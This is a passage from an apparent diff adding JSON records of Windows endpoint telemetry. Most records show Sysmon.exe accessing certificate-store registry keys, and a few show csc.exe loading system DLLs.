{ + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 